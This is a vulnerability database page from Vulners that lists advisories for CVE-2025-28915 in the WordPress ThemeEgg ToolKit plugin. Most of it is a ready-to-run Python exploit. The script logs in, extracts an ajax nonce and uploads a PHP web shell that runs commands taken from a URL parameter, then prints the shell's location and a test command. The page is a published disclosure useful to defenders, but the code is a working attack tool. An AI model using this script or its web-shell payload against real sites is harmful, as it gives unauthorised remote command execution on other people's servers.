Vulners
Lucene search
WordPress ThemeEgg ToolKit 1.2.9 Shell Upload Exploit
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Exploit for CVE-2025-28915 | 14 Mar 202509:30 | – | githubexploit |
| Exploit for CVE-2025-28915 | 12 Mar 202503:23 | – | githubexploit |
 | CVE-2025-28915 | 11 Mar 202522:40 | – | circl |
 | WordPress plugin ThemeEgg ToolKit 代码问题漏洞 | 11 Mar 202500:00 | – | cnnvd |
 | CVE-2025-28915 | 11 Mar 202521:01 | – | cve |
 | CVE-2025-28915 WordPress ThemeEgg ToolKit plugin <= 1.2.9 - Arbitrary File Upload vulnerability | 11 Mar 202521:01 | – | cvelist |
 | CVE-2025-28915 | 11 Mar 202521:15 | – | nvd |
 | WordPress ThemeEgg ToolKit 1.2.9 Shell Upload | 12 Mar 202500:00 | – | packetstormnews |
 | WordPress ThemeEgg ToolKit plugin <= 1.2.9 - Arbitrary File Upload vulnerability | 11 Mar 202521:46 | – | patchstack |
 | CVE-2025-28915 | 13 Mar 202521:57 | – | redhatcve |
10
import argparse
import re
import time
import requests
from bs4 import BeautifulSoup
#by Nxploit | Khaled Alenazi
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
def display_banner():
banner = """
..######..##.....##.########..........#######....#####....#######..########..........#######...#######...#######.....##...########
.##....##.##.....##.##...............##.....##..##...##..##.....##.##...............##.....##.##.....##.##.....##..####...##......
.##.......##.....##.##......................##.##.....##........##.##......................##.##.....##.##.....##....##...##......
.##.......##.....##.######...#######..#######..##.....##..#######..#######..#######..#######...#######...########....##...#######.
.##........##...##..##...............##........##.....##.##..............##.........##........##.....##........##....##.........##
.##....##...##.##...##...............##.........##...##..##........##....##.........##........##.....##.##.....##....##...##....##
..######.....###....########.........#########...#####...#########..######..........#########..#######...#######...######..######.
Exploit by : Khaled Alenazi ,Nxploit
"""
print(banner)
def check_version(url):
version_url = f"{url}/wp-content/plugins/themeegg-toolkit/readme.txt"
response = requests.get(version_url, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
if response.status_code == 200:
match = re.search(r'Stable tag: (\d+\.\d+\.\d+)', response.text)
if match and match.group(1) <= "1.2.9":
print(f"[+] Vulnerable version detected: {match.group(1)}")
time.sleep(3)
return True
print("[-] The target does not appear to be vulnerable.")
return False
def login(url, username, password, session):
login_url = f"{url}/wp-login.php"
login_data = {"log": username, "pwd": password, "rememberme": "forever", "wp-submit": "Log In"}
response = session.post(login_url, data=login_data, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
return any('wordpress_logged_in' in cookie.name for cookie in session.cookies)
def get_security_nonce(url, session):
settings_page = session.get(f"{url}/wp-admin/themes.php?page=themeegg-toolkit", headers={"User-Agent": "Mozilla/5.0"})
soup = BeautifulSoup(settings_page.text, "html.parser")
for script in soup.find_all("script"):
match = re.search(r'"ajax_nonce":"(\w+)"', script.text)
if match:
return match.group(1)
return None
def exploit(url, username, password):
if not check_version(url):
return
if login(url, username, password, session):
print("[+] Logged in successfully.")
else:
print("[-] Failed to log in.")
return
nonce_value = get_security_nonce(url, session)
if not nonce_value:
print("[-] Failed to extract security nonce.")
return
print(f"[+] Found security nonce: {nonce_value}")
shell_code = "<?php system($_GET['cmd']); ?>"
files = {
"action": (None, "TETK_import_demo_data"),
"security": (None, nonce_value),
"customizer_file": ("shell.php", shell_code, "application/x-php")
}
upload_url = f"{url}/wp-admin/admin-ajax.php"
print("[*] Uploading Web Shell...")
response = session.post(upload_url, files=files, headers={"User-Agent": "Mozilla/5.0"}, verify=False)
time.sleep(3)
if response.status_code == 200:
print("[+] Web Shell uploaded successfully!")
shell_path = f"{url}/wp-content/uploads/2025/03/shell.php"
print(f"[+] Potential Web Shell location: {shell_path}")
print(f"[*] Test command: {shell_path}?cmd=id")
else:
print("[-] File upload failed. Check if you have sufficient privileges or if there are additional protections.")
if __name__ == "__main__":
display_banner()
parser = argparse.ArgumentParser(description="Exploit for ThemeEgg ToolKit File Upload Vulnerability")
parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://192.168.100.74:888/wordpress)")
parser.add_argument("-un", "--username", required=True, help="WordPress username")
parser.add_argument("-p", "--password", required=True, help="WordPress password")
args = parser.parse_args()
exploit(args.url, args.username, args.password)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Mar 2025 00:00Current
9.4High risk
Vulners AI Score9.4
CVSS 3.19.1
EPSS0.24852
SSVC